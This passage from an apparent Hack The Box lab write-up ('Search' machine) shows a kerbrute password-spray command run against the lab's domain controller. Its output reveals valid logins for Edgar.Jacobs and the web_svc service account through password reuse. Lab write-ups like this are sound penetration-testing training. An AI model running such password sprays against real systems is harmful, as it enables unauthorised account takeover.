Password Spray
Given the nature of the compromised account, web_svc, being a valid “service account”, it must be managed somehow by “someone”. Therefore, it is rather reasonable to assume that “someone” might have provided their own password for ease of access. I will test just that in the following sections.
┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ kerbrute passwordspray --dc research.search.htb -d SEARCH.HTB users.txt @3ONEmillionbaby
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 01/30/24 - Ronnie Flathers @ropnop
2024/01/30 17:45:18 > Using KDC(s):
2024/01/30 17:45:18 > research.search.htb:88
2024/01/30 17:45:18 > [+] VALID LOGIN: Edgar.Jacobs@SEARCH.HTB:@3ONEmillionbaby
2024/01/30 17:45:19 > [+] VALID LOGIN: web_svc@SEARCH.HTB:@3ONEmillionbaby
2024/01/30 17:45:19 > Done! Tested 105 logins (2 successes) in 0.721 secondsPassword reuse confirmed
The edgar.jaconbs user was that “someone” behind the service account, web_svc
Validation will be made by requesting for a TGT